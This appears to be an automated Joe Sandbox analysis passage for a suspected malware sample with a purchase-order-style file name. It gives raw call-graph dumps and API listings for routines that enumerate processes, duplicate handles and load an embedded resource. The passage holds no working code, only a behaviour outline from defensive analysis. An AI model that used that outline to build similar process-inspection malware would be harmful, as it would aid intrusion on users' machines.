424f18 39714->39474 39715 424f24 39715->39474 39729->39714 39730->39715 39808 413f4f 39781->39808 39784 413f37 K32GetModuleFileNameExW 39785 413f4a 39784->39785 39785->38645 39787 413969 wcscpy 39786->39787 39788 41396c wcschr 39786->39788 39791 413a3a 39787->39791 39788->39787 39790 41398e 39788->39790 39813 4097f7 wcslen wcslen _memicmp 39790->39813 39791->38645 39793 41399a 39794 4139a4 memset 39793->39794 39795 4139e6 39793->39795 39814 409dd5 GetWindowsDirectoryW wcscpy 39794->39814 39797 413a31 wcscpy 39795->39797 39798 4139ec memset 39795->39798 39797->39791 39815 409dd5 GetWindowsDirectoryW wcscpy 39798->39815 39799 4139c9 wcscpy wcscat 39799->39791 39801 413a11 memcpy wcscat 39801->39791 39803 413cb0 GetModuleHandleW 39802->39803 39804 413cda 39802->39804 39803->39804 39807 413cbf GetProcAddress 39803->39807 39805 413ce3 GetProcessTimes 39804->39805 39806 413cf6 39804->39806 39805->38650 39806->38650 39807->39804 39809 413f2f 39808->39809 39810 413f54 39808->39810 39809->39784 39809->39785 39811 40a804 8 API calls 39810->39811 39812 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39811->39812 39812->39809 39813->39793 39814->39799 39815->39801 39816->38670 39817->38694 39819 409cf9 GetVersionExW 39818->39819 39820 409d0a 39818->39820 39819->39820 39820->38700 39820->38705 39821->38706 39822->38710 39823->38712 39824->38778 39826 40bba5 39825->39826 39870 40cc26 39826->39870 39829 40bd4b 39891 40cc0c 39829->39891 39834 40b2cc 27 API calls 39835 40bbef 39834->39835 39898 40ccf0 _wcsicmp 39835->39898 39837 40bbf5 39837->39829 39899 40ccb4 6 API calls 39837->39899 39839 40bc26 39840 40cf04 17 API calls 39839->39840 39841 40bc2e 39840->39841 39842 40bd43 39841->39842 39843 40b2cc 27 API calls 39841->39843 39844 40cc0c 4 API calls 39842->39844 39845 40bc40 39843->39845 39844->39829 39900 40ccf0 _wcsicmp 39845->39900 39847 40bc46 39847->39842 39848 40bc61 memset memset WideCharToMultiByte 39847->39848 39901 40103c strlen 39848->39901 39850 40bcc0 39851 40b273 27 API calls 39850->39851 39852 40bcd0 memcmp 39851->39852 39852->39842 39853 40bce2 39852->39853 39854 404423 38 API calls 39853->39854 39855 40bd10 39854->39855 39855->39842 39856 40bd3a LocalFree 39855->39856 39857 40bd1f memcpy 39855->39857 39856->39842 39857->39856 39858->38793 39859->38830 39860->38830 39861->38830 39862->38830 39863->38830 39864->38830 39865->38830 39866->38830 39867->38830 39868->38805 39869->38827 39902 4096c3 CreateFileW 39870->39902 39872 40cc34 39873 40cc3d GetFileSize 39872->39873 39881 40bbca 39872->39881 39874 40afcf 2 API calls 39873->39874 39875 40cc64 39874->39875 39903 40a2ef ReadFile 39875->39903 39877 40cc71 39904 40ab4a MultiByteToWideChar 39877->39904 39879 40cc95 CloseHandle 39880 40b04b ??3@YAXPAX 39879->39880 39880->39881 39881->39829 39882 40cf04 39881->39882 39883 40b633 free 39882->39883 39884 40cf14 39883->39884 39910 40b1ab free free 39884->39910 39886 40cf1b 39887 40cfef 39886->39887 39890 40bbdd 39886->39890 39911 40cd4b 39886->39911 39889 40cd4b 14 API calls 39887->39889 39889->39890 39890->39829 39890->39834 39892 40b633 free 39891->39892 39893 40cc15 39892->39893 39894 40aa04 free 39893->39894 39895 40cc1d 39894->39895 39952 40b1ab free free 39895->39952 39897 40b7d4 memset CreateFileW 39897->38785 39897->38786 39898->39837 39899->39839 39900->39847 39901->39850 39902->39872 39903->39877 39905 40ab93 39904->39905 39906 40ab6b 39904->39906 39905->39879 39907 40a9ce 4 API calls 39906->39907 39908 40ab74 39907->39908 39909 40ab7c MultiByteToWideChar 39908->39909 39909->39905 39910->39886 39912 40cd7b 39911->39912 39913 40aa29 6 API calls 39912->39913 39917 40cd89 39913->39917 39914 40cef5 39915 40aa04 free 39914->39915 39916 40cefd 39915->39916 39916->39886 39917->39914 39918 40aa29 6 API calls 39917->39918 39919 40ce1d 39918->39919 39920 40aa29 6 API calls 39919->39920 39921 40ce3e 39920->39921 39922 40ce6a 39921->39922 39945 40abb7 wcslen memmove 39921->39945 39923 40ce9f 39922->39923 39948 40abb7 wcslen memmove 39922->39948 39926 40a8d0 7 API calls 39923->39926 39929 40ceb5 39926->39929 39927 40ce56 39946 40aa71 wcslen 39927->39946 39928 40ce8b 39949 40aa71 wcslen 39928->39949 39933 40a8d0 7 API calls 39929->39933 39932 40ce5e 39947 40abb7 wcslen memmove 39932->39947 39936 40cecb 39933->39936 39934 40ce93 39950 40abb7 wcslen memmove 39934->39950 39951 40d00b malloc memcpy free free 39936->39951 39939 40cedd 39940 40aa04 free 39939->39940 39941 40cee5 39940->39941 39942 40aa04 free 39941->39942 39943 40ceed 39942->39943 39944 40aa04 free 39943->39944 39944->39914 39945->39927 39946->39932 39947->39922 39948->39928 39949->39934 39950->39923 39951->39939 39952->39897 39953->38845 39954->38853 39955 4147f3 39958 414561 39955->39958 39957 414813 39959 41456d 39958->39959 39960 41457f GetPrivateProfileIntW 39958->39960 39963 4143f1 memset _itow WritePrivateProfileStringW 39959->39963 39960->39957 39962 41457a 39962->39957 39963->39962 39964 44def7 39965 44df07 39964->39965 39966 44df00 ??3@YAXPAX 39964->39966 39967 44df17 39965->39967 39968 44df10 ??3@YAXPAX 39965->39968 39966->39965 39969 44df27 39967->39969 39970 44df20 ??3@YAXPAX 39967->39970 39968->39967 39971 44df37 39969->39971 39972 44df30 ??3@YAXPAX 39969->39972 39970->39969 39972->39971 39973 4148b6 FindResourceW 39974 4148cf SizeofResource 39973->39974 39977 4148f9 39973->39977 39975 4148e0 LoadResource 39974->39975 39974->39977 39976 4148ee LockResource 39975->39976 39975->39977 39976->39977 39978 441b3f 39988 43a9f6 39978->39988 39980 441b61 40161 4386af memset 39980->40161 39982 44189a 39983 442bd4 39982->39983 39984 4418e2 39982->39984 39985 4418ea 39983->39985 40163 441409 memset 39983->40163 39984->39985 40162 4414a9 12 API calls 39984->40162 39989 43aa20 39988->39989 39990 43aadf 39988->39990 39989->39990 39991 43aa34 memset 39989->39991 39990->39980 39992 43aa56 39991->39992 39993 43aa4d 39991->39993 40164 43a6e7 39992->40164 40172 42c02e memset 39993->40172 39998 43aad3 40174 4169a7 11 API calls 39998->40174 39999 43aaae 39999->39990 39999->39998 40014 43aae5 39999->40014 40001 43ac18 40003 43ac47 40001->40003 40176 42bbd5 memcpy memcpy memcpy memset memcpy 40001->40176 40004 43aca8 40003->40004 40177 438eed 16 API calls 40003->40177 40008 43acd5 40004->40008 40179 4233ae 11 API calls 40004->40179 40007 43ac87 40178 4233c5 16 API calls 40007->40178 40180 423426 11 API calls 40008->40180 40012 43ace1 40181 439811 163 API calls 40012->40181 40013 43a9f6 161 API calls 40013->40014 40014->39990 40014->40001 40014->40013 40175 439bbb 22 API calls 40014->40175 40016 43acfd 40022 43ad2c 40016->40022 40182 438eed 16 API calls 40016->40182 40018 43ad19 40183 4233c5 16 API calls 40018->40183 40020 43ad58 40184 44081d 163 API calls 40020->40184 40022->40020 40024 43add9 40022->40024 40024->40024 40188 423426 11 API calls 40024->40188 40025 43ae3a memset 40026 43ae73 40025->40026 40189 42e1c0 147 API calls 40026->40189 40027 43adab 40186 438c4e 163 API calls 40027->40186 40029 43ad6c 40029->39990 40029->40027 40185 42370b memset memcpy memset 40029->40185 40031 43ae96 40190 42e1c0 147 API calls 40031->40190 40033 43adcc 40187 440f84 12 API calls 40033->40187 40036 43aea8 40037 43aec1 40036->40037 40191 42e199 147 API calls 40036->40191 40039 43af00 40037->40039 40192 42e1c0 147 API calls 40037->40192 40039->39990 40042 43af1a 40039->40042 40043 43b3d9 40039->40043 40193 438eed 16 API calls 40042->40193 40048 43b3f6 40043->40048 40055 43b4c8 40043->40055 40045 43b60f 40045->39990 40252 4393a5 17 API calls 40045->40252 40046 43af2f 40194 4233c5 16 API calls 40046->40194 40234 432878 12 API calls 40048->40234 40050 43af51 40195 423426 11 API calls 40050->40195 40053 43af7d 40196 423426 11 API calls 40053->40196 40054 43b4f2 40241 43a76c 21 API calls 40054->40241 40055->40054 40240 42bbd5 memcpy memcpy memcpy memset memcpy 40055->40240 40059 43b529 40242 44081d 163 API calls 40059->40242 40060 43b428 40088 43b462 40060->40088 40235 432b60 16 API calls 40060->40235 40061 43af94 40197 423330 11 API calls 40061->40197 40065 43b47e 40068 43b497 40065->40068 40237 42374a memcpy memset memcpy memcpy memcpy 40065->40237 40066 43b544 40076 43b55c 40066->40076 40243 42c02e memset 40066->40243 40067 43afca 40198 423330 11 API calls 40067->40198 40238 4233ae 11 API calls 40068->40238 40073 43afdb 40199 4233ae 11 API calls 40073->40199 40075 43b4b1 40239 423399 11 API calls 40075->40239 40244 43a87a 163 API calls 40076->40244 40078 43b56c 40081 43b58a 40078->40081 40245 423330 11 API calls 40078->40245 40080 43afee 40200 44081d 163 API calls 40080->40200 40246 440f84 12 API calls 40081->40246 40083 43b4c1 40248 42db80 163 API calls 40083->40248 40087 43b592 40247 43a82f 16 API calls 40087->40247 40236 423330 11 API calls 40088->40236 40091 43b5b4 40249 438c4e 163 API calls 40091->40249 40093 43b5cf 40250 42c02e memset 40093->40250 40095 43b005 40095->39990 40100 43b01f 40095->40100 40201 42d836 163 API calls 40095->40201 40096 43b1ef 40211 4233c5 16 API calls 40096->40211 40098 43b212 40212 423330 11 API calls 40098->40212 40100->40096 40209 423330 11 API calls 40100->40209 40210 42d71d 163 API calls 40100->40210 40102 43add4 40102->40045 40251 438f86 16 API calls 40102->40251 40105 43b087 40202 4233ae 11 API calls 40105->40202 40106 43b22a 40213 42ccb5 11 API calls 40106->40213 40109 43b10f 40205 423330 11 API calls 40109->40205 40110 43b23f 40214 4233ae 11 API calls 40110->40214 40112 43b257 40215 4233ae 11 API calls 40112->40215 40116 43b129 40206 4233ae 11 API calls 40116->40206 40117 43b26e 40216 4233ae 11 API calls 40117->40216 40119 43b09a 40119->40109 40203 42cc15 19 API calls 40119->40203 40204 4233ae 11 API calls 40119->40204 40121 43b282 40217 43a87a 163 API calls 40121->40217 40123 43b13c 40207 440f84 12 API calls 40123->40207 40125 43b29d 40218 423330 11 API calls 40125->40218 40128 43b15f 40208 4233ae 11 API calls 40128->40208 40129 43b2af 40131 43b2b8 40129->40131 40132 43b2ce 40129->40132 40219 4233ae 11 API calls 40131->40219 40220 440f84 12 API calls 40132->40220 40135 43b2c9 40222 4233ae 11 API calls 40135->40222 40136 43b2da 40221 42370b memset memcpy memset 40136->40221 40139 43b2f9 40223 423330 11 API calls 40139->40223 40141 43b30b 40224 423330 11 API calls 40141->40224 40143 43b325 40225 423399 11 API calls 40143->40225 40145 43b332 40226 4233ae 11 API calls 40145->40226 40147 43b354 40227 423399 11 API calls 40147->40227 40149 43b364 40228 43a82f 16 API calls 40149->40228 40151 43b370 40229 42db80 163 API calls 40151->40229 40153 43b380 40230 438c4e 163 API calls 40153->40230 40155 43b39e 40231 423399 11 API calls 40155->40231 40157 43b3ae 40232 43a76c 21 API calls 40157->40232 40159 43b3c3 40233 423399 11 API calls 40159->40233 40161->39982 40162->39985 40163->39983 40165 43a6f5 40164->40165 40171 43a765 40164->40171 40165->40171 40253 42a115 40165->40253 40169 43a73d 40170 42a115 147 API calls 40169->40170 40169->40171 40170->40171 40171->39990 40173 4397fd memset 40171->40173 40172->39992 40173->39999 40174->39990 40175->40014 40176->40003 40177->40007 40178->40004 40179->40008 40180->40012 40181->40016 40182->40018 40183->40022 40184->40029 40185->40027 40186->40033 40187->40102 40188->40025 40189->40031 40190->40036 40191->40037 40192->40037 40193->40046 40194->40050 40195->40053 40196->40061 40197->40067 40198->40073 40199->40080 40200->40095 40201->40105 40202->40119 40203->40119 40204->40119 40205->40116 40206->40123 40207->40128 40208->40100 40209->40100 40210->40100 40211->40098 40212->40106 40213->40110 40214->40112 40215->40117 40216->40121 40217->40125 40218->40129 40219->40135 40220->40136 40221->40135 40222->40139 40223->40141 40224->40143 40225->40145 40226->40147 40227->40149 40228->40151 40229->40153 40230->40155 40231->40157 40232->40159 40233->40102 40234->40060 40235->40088 40236->40065 40237->40068 40238->40075 40239->40083 40240->40054 40241->40059 40242->40066 40243->40076 40244->40078 40245->40081 40246->40087 40247->40083 40248->40091 40249->40093 40250->40102 40251->40045 40252->39990 40254 42a175 40253->40254 40256 42a122 40253->40256 40254->40171 40259 42b13b 147 API calls 40254->40259 40256->40254 40257 42a115 147 API calls 40256->40257 40260 43a174 40256->40260 40284 42a0a8 147 API calls 40256->40284 40257->40256 40259->40169 40274 43a196 40260->40274 40275 43a19e 40260->40275 40261 43a306 40261->40274 40300 4388c4 14 API calls 40261->40300 40264 42a115 147 API calls 40264->40275 40265 415a91 memset 40265->40275 40266 43a642 40266->40274 40304 4169a7 11 API calls 40266->40304 40270 43a635 40303 42c02e memset 40270->40303 40274->40256 40275->40261 40275->40264 40275->40265 40275->40274 40285 42ff8c 40275->40285 40293 4165ff 40275->40293 40296 439504 13 API calls 40275->40296 40297 4312d0 147 API calls 40275->40297 40298 42be4c memcpy memcpy memcpy memset memcpy 40275->40298 40299 43a121 11 API calls 40275->40299 40277 4169a7 11 API calls 40278 43a325 40277->40278 40278->40266 40278->40270 40278->40274 40278->40277 40279 42b5b5 memset memcpy 40278->40279 40280 42bf4c 14 API calls 40278->40280 40283 4165ff 11 API calls 40278->40283 40301 42b63e 14 API calls 40278->40301 40302 42bfcf memcpy 40278->40302 40279->40278 40280->40278 40283->40278 40284->40256 40305 43817e 40285->40305 40287 42ff99 40288 42ffe3 40287->40288 40289 42ffd0 40287->40289 40292 42ff9d 40287->40292 40310 4169a7 11 API calls 40288->40310 40309 4169a7 11 API calls 40289->40309 40292->40275 40294 4165a0 11 API calls 40293->40294 40295 41660d 40294->40295 40295->40275 40296->40275 40297->40275 40298->40275 40299->40275 40300->40278 40301->40278 40302->40278 40303->40266 40304->40274 40306 438187 40305->40306 40308 438192 40305->40308 40311 4380f6 40306->40311 40308->40287 40309->40292 40310->40292 40313 43811f 40311->40313 40312 438164 40312->40308 40313->40312 40315 4300e8 3 API calls 40313->40315 40316 437e5e 40313->40316 40315->40313 40339 437d3c 40316->40339 40318 437eb3 40318->40313 40319 437ea9 40319->40318 40325 437f22 40319->40325 40354 41f432 40319->40354 40322 437f06 40401 415c56 11 API calls 40322->40401 40324 437f95 40402 415c56 11 API calls 40324->40402 40326 437f7f 40325->40326 40327 432d4e 3 API calls 40325->40327 40326->40324 40329 43802b 40326->40329 40327->40326 40330 4165ff 11 API calls 40329->40330 40331 438054 40330->40331 40365 437371 40331->40365 40334 43806b 40335 438094 40334->40335 40403 42f50e 138 API calls 40334->40403 40337 437fa3 40335->40337 40338 4300e8 3 API calls 40335->40338 40337->40318 40404 41f638 104 API calls 40337->40404 40338->40337 40340 437d69 40339->40340 40343 437d80 40339->40343 40405 437ccb 11 API calls 40340->40405 40342 437d76 40342->40319 40343->40342 40344 437da3 40343->40344 40346 437d90 40343->40346 40347 438460 134 API calls 40344->40347 40346->40342 40409 437ccb 11 API calls 40346->40409 40350 437dcb 40347->40350 40349 437de8 40408 424f26 123 API calls 40349->40408 40350->40349 40406 444283 13 API calls 40350->40406 40352 437dfc 40407 437ccb 11 API calls 40352->40407 40355 41f54d 40354->40355 40361 41f44f 40354->40361 40356 41f466 40355->40356 40439 41c635 memset memset 40355->40439 40356->40322 40356->40325 40361->40356 40363 41f50b 40361->40363 40410 41f1a5 40361->40410 40435 41c06f memcmp 40361->40435 40436 41f3b1 90 API calls 40361->40436 40437 41f398 86 API calls 40361->40437 40363->40355 40363->40356 40438 41c295 86 API calls 40363->40438 40366 41703f 11 API calls 40365->40366 40367 437399 40366->40367 40368 43739d 40367->40368 40371 4373ac 40367->40371 40440 4446ea 11 API calls 40368->40440 40370 4373a7 40370->40334 40372 416935 16 API calls 40371->40372 40373 4373ca 40372->40373 40375 438460 134 API calls 40373->40375 40379 4251c4 137 API calls 40373->40379 40383 415a91 memset 40373->40383 40386 43758f 40373->40386 40398 437584 40373->40398 40400 437d3c 135 API calls 40373->40400 40441 425433 13 API calls 40373->40441 40442 425413 17 API calls 40373->40442 40443 42533e 16 API calls 40373->40443 40444 42538f 16 API calls 40373->40444 40445 42453e 123 API calls 40373->40445 40374 4375bc 40377 415c7d 16 API calls 40374->40377 40375->40373 40378 4375d2 40377->40378 40378->40370 40380 4442e6 11 API calls 40378->40380 40379->40373 40381 4375e2 40380->40381 40381->40370 40448 444283 13 API calls 40381->40448 40383->40373 40446 42453e 123 API calls 40386->40446 40387 4375f4 40392 437620 40387->40392 40393 43760b 40387->40393 40391 43759f 40394 416935 16 API calls 40391->40394 40396 416935 16 API calls 40392->40396 40449 444283 13 API calls 40393->40449 40394->40398 40396->40370 40398->40374 40447 42453e 123 API calls 40398->40447 40399 437612 memcpy 40399->40370 40400->40373 40401->40318 40402->40337 40403->40335 40404->40318 40405->40342 40406->40352 40407->40349 40408->40342 40409->40342 40411 41bc3b 101 API calls 40410->40411 40412 41f1b4 40411->40412 40413 41edad 86 API calls 40412->40413 40420 41f282 40412->40420 40414 41f1cb 40413->40414 40415 41f1f5 memcmp 40414->40415 40416 41f20e 40414->40416 40414->40420 40415->40416 40417 41f21b memcmp 40416->40417 40416->40420 40418 41f326 40417->40418 40421 41f23d 40417->40421 40419 41ee6b 86 API calls 40418->40419 40418->40420 40419->40420 40420->40361 40421->40418 40422 41f28e memcmp 40421->40422 40424 41c8df 56 API calls 40421->40424 40422->40418 40423 41f2a9 40422->40423 40423->40418 40426 41f308 40423->40426 40427 41f2d8 40423->40427 40425 41f269 40424->40425 40425->40418 40428 41f287 40425->40428 40429 41f27a 40425->40429 40426->40418 40433 4446ce 11 API calls 40426->40433 40430 41ee6b 86 API calls 40427->40430 40428->40422 40431 41ee6b 86 API calls 40429->40431 40432 41f2e0 40430->40432 40431->40420 40434 41b1ca memset 40432->40434 40433->40418 40434->40420 40435->40361 40436->40361 40437->40361 40438->40355 40439->40356 40440->40370 40441->40373 40442->40373 40443->40373 40444->40373 40445->40373 40446->40391 40447->40374 40448->40387 40449->40399 40450 441819 40453 430737 40450->40453 40452 441825 40454 430756 40453->40454 40466 43076d 40453->40466 40455 430774 40454->40455 40456 43075f 40454->40456 40467 43034a 40455->40467 40478 4169a7 11 API calls 40456->40478 40459 4307ce 40461 430819 memset 40459->40461 40471 415b2c 40459->40471 40460 43077e 40460->40459 40464 4307fa 40460->40464 40460->40466 40461->40466 40463 4307e9 40463->40461 40463->40466 40479 4169a7 11 API calls 40464->40479 40466->40452 40468 43034e 40467->40468 40470 430359 40467->40470 40480 415c23 memcpy 40468->40480 40470->40460 40472 415b46 40471->40472 40473 415b42 40471->40473 40472->40463 40473->40472 40474 415b94 40473->40474 40476 415b5a 40473->40476 40475 4438b5 10 API calls 40474->40475 40475->40472 40476->40472 40477 415b79 memcpy 40476->40477 40477->40472 40478->40466 40479->40466 40480->40470 40481 41493c EnumResourceNamesW

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                • String ID: dllhost.exe$p+v@Fv@Bv$taskhost.exe$taskhostex.exe
                                                                                • API String ID: 708747863-3857311822
                                                                                • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                APIs
                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                • memset.MSVCRT ref: 00413D7F
                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                • memset.MSVCRT ref: 00413E07
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                • free.MSVCRT ref: 00413EC1
                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                • API String ID: 1344430650-1740548384
                                                                                • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
